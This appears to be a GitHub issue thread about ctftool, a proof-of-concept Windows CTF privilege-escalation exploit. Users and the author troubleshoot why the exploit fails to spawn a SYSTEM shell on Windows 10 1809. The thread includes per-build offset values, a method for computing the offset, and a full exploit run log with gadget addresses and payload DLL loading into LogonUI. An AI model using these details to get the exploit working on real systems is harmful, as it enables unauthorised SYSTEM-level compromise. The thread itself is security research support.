No cmd spawned on Win 10 Enterprise 1809

[mattwhatkins]

I'm experimenting with this in a corporate environment, but I can't seem to get a cmd shell spawned. Apologies if I'm missing something trivial.

Host is a Win10 VM Enterprise 1809 running in VMWare. Latest updates are from the 6th July.

Testing with the ctf-consent-system.ctf, ctf-exploit-common-win10.ctf and ctf-logonui-system.ctf fails to result in a shell being spawned, yet the output shows Exploit complete. Checking process explorer, there are no new cmd.exe processes running in other sessions/hidden.

Is this expected to work or am I missing something? What's the best way to go about debugging this?

[cloudsbyzeus]

Having the same experience with this.

[KillaEslieBee]

On a testmachine i had the same problem. I editted the ctf-exploit-common-win10.ctf and in my case the offset (not certain if i used the correct term for it!) used for 1903 also worked for my test machine. So i replaced the offset with the offset from 1903 -> 480 and replaced it in the rightspot. Saved the file and now the stuff is working.

If it doesnt work try tinkering with that value for your build, for my 1803 offset 480 worked perfectly.

set r0 1903 eq r0 regval repeat r0 set r3 480

set r0 1809 eq r0 regval repeat r0 set r3 496

set r0 1803 eq r0 regval repeat r0 set r3 480

set r0 1709 eq r0 regval repeat r0 set r3 452

set r0 1703 eq r0 regval repeat r0 set r3 401

[taviso]

Thanks for the bug report, can you paste the output you see?

Also, can you find the version of MSCTF.DLL?

I did test it on 1809, but it might be a different patchlevel I didn't check...

[cloudsbyzeus]

HI @KillaEslieBee @taviso

I am also testing with 1809, and I tried different values with no success. What is your recommendation to identify what is the correct value to use here?

[taviso]

If you tell me the version of MSCTF.DLL you have, I can check.

[cloudsbyzeus]

@taviso, version is 10.0.17763.529

[taviso]

I just took a look at that version, the correct offset is 496 - which should be automatically matched to 1809.

(To find the offset, I just subtract the pointer to CTIPProxy::Reconvert in the CTIPProxy vtable from the base of the CStubIEnumTfInputProcessorProfiles::_StubTbl, and divide by 8).

Can you show the full output from the exploit, it must be some other problem.

[cloudsbyzeus]

Microsoft Defender just caught it as: HackTool:Win32/CTFExtool

[cloudsbyzeus]

An interactive ctf exploration tool by @taviso. Type "help" for available commands. Most commands require a connection, see "help connect". ctf> connect The ctf server port is located at \BaseNamedObjects\msctf.serverDefault3 NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault3") => 0 Connected to CTF server@\BaseNamedObjects\msctf.serverDefault3, Handle 00000224 ctf> scan Client 0, Tid 16156 (Flags 0x08, Hwnd 00003F1C, Pid 12924, explorer.exe) Client 1, Tid 3140 (Flags 0x08, Hwnd 00000C44, Pid 12924, explorer.exe) Client 2, Tid 14272 (Flags 0x08, Hwnd 000037C0, Pid 12924, explorer.exe) Client 3, Tid 3908 (Flags 0x08, Hwnd 00000F44, Pid 12924, explorer.exe) Client 4, Tid 9076 (Flags 0x08, Hwnd 00002374, Pid 12924, explorer.exe) Client 5, Tid 248 (Flags 0x0c, Hwnd 000000F8, Pid 12924, explorer.exe) Client 6, Tid 3408 (Flags 0x08, Hwnd 00000D50, Pid 12924, explorer.exe) Client 7, Tid 9408 (Flags 0x08, Hwnd 000024C0, Pid 12924, explorer.exe) Client 8, Tid 7472 (Flags 0x08, Hwnd 00001D30, Pid 12924, explorer.exe) Client 9, Tid 5828 (Flags 0x08, Hwnd 000016C4, Pid 12924, explorer.exe) Client 10, Tid 9376 (Flags 0x08, Hwnd 000024A0, Pid 12924, explorer.exe) Client 11, Tid 15456 (Flags 0x0c, Hwnd 00003C60, Pid 9872, ShellExperienceHost.exe) Client 12, Tid 1272 (Flags 0x0c, Hwnd 000004F8, Pid 908, SearchUI.exe) Client 13, Tid 1128 (Flags 0x0c, Hwnd 00000468, Pid 908, SearchUI.exe) Client 14, Tid 12252 (Flags 0x08, Hwnd 00002FDC, Pid 10216, ApplicationFrameHost.exe) Client 15, Tid 7620 (Flags 0x08, Hwnd 00001DC4, Pid 10216, ApplicationFrameHost.exe) Client 16, Tid 11020 (Flags 0x0c, Hwnd 00002B0C, Pid 16600, MicrosoftEdge.exe) Client 17, Tid 7792 (Flags 0x0c, Hwnd 00001E70, Pid 6892, MicrosoftEdgeCP.exe) Client 18, Tid 3712 (Flags 0000, Hwnd 00000E80, Pid 13328, ctfmon.exe) Client 19, Tid 572 (Flags 0x08, Hwnd 0000023C, Pid 5152, FF_Protection.exe) Client 20, Tid 7504 (Flags 0x08, Hwnd 00001D50, Pid 14036, OneDrive.exe) Client 21, Tid 12616 (Flags 0x0c, Hwnd 00003148, Pid 212, LockApp.exe) Client 22, Tid 2216 (Flags 0x08, Hwnd 000008A8, Pid 9704, Taskmgr.exe) Client 23, Tid 13516 (Flags 0x08, Hwnd 000034CC, Pid 4828, regedit.exe) Client 24, Tid 12140 (Flags 0x0c, Hwnd 00002F6C, Pid 10984, SecHealthUI.exe) Client 25, Tid 10924 (Flags 0x0c, Hwnd 00002AAC, Pid 15200, MicrosoftEdgeCP.exe) Client 26, Tid 9144 (Flags 0000, Hwnd 000023B8, Pid 7748, ctftool.exe) Client 27, Tid 13204 (Flags 0x08, Hwnd 00003394, Pid 7436, conhost.exe) ctf> script .\scripts\ctf-logonui-system.ctf Attempting to copy exploit payload... Overwrite C:\TEMP\EXPLOIT.DLL (Yes/No/All)? a C:payload64.dll 1 File(s) copied The screen will lock to trigger the login screen in 5 seconds... Closing existing ALPC Port Handle 00000224... The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon3 Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon3, Handle 0000023C Client 0, Tid 9144 (Flags 0000, Hwnd 000023B8, Pid 7748, ctftool.exe) Client 1, Tid 11904 (Flags 0x1000000c, Hwnd 00002E80, Pid 15592, LogonUI.exe) Found new client LogonUI.exe, DefaultThread now 11904 ReleaseId is 1809 Guessed msvcrt => C:\Windows\system32\msvcrt.DLL Found Gadget 48895C... in module msvcrt at offset 0x31140 C:\Windows\system32\msvcrt.DLL->.text->VirtualAddress is 0x001000 C:\Windows\system32\msvcrt.DLL->.text->PointerToRawData is 0x000400 C:\Windows\system32\kernel32.DLL->.data->VirtualAddress is 0x0a9000 Command succeeded, stub created Dumping Marshal Parameter 3 (Base 000E04F0, Type 0x106, Size 0x18, Offset 0x40) 000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c M..q(....*..[.C\ 000010: 01 00 00 00 dc ff 65 4e ......eN Marshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x4e65ffdc 0x7ffe32320000 0x7ffe2f640000 0x7ffe30240000 Guessed msctf => C:\Windows\system32\msctf.DLL Found Gadget 488b41... in module msctf at offset 0xb9cc0 C:\Windows\system32\msctf.DLL->.text->VirtualAddress is 0x001000 C:\Windows\system32\msctf.DLL->.text->PointerToRawData is 0x000400 0x7ffe2f640000 Guessed kernel32 => C:\Windows\system32\kernel32.DLL C:\Windows\system32\kernel32.DLL is a 64bit module. kernel32!LoadLibraryA@0x180000000+0x1f220 The CFG call chain is built, writing in parameters... Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"... 0x7ffe30740000 Guessed combase => C:\Windows\system32\combase.DLL Found Gadget 488b49... in module combase at offset 0x1eaac0 C:\Windows\system32\combase.DLL->.text->VirtualAddress is 0x001000 C:\Windows\system32\combase.DLL->.text->PointerToRawData is 0x000400 Payload created and call chain ready, get ready...

Exploit complete.

ctf>

[taviso]

Hmmm... it looks okay, can you try using script .\scripts\ctf-consent-system.ctf script instead?

The only thing I can think of is there are some group policy settings that change how the loginui one works.

[jgrotter]

Microsoft Defender just caught it as: HackTool:Win32/CTFExtool

+1 - MS Security just started flagging/deleting

[cloudsbyzeus]

Hmmm... it looks okay, can you try using script .\scripts\ctf-consent-system.ctf script instead?

The only thing I can think of is there are some group policy settings that change how the loginui one works.

Yes in both cases a cmd is not spawned. Its a default install. Don't think it has anything special.

[Knallkoppon]

I'm on Windows 10 Enterprise 1709. Doesn't work. I think it is caused by the Extended Support of the Enterprise Versions. My MSCTF.DLL is on version 10.0.16299.696. I didn't understand how to calc the offset.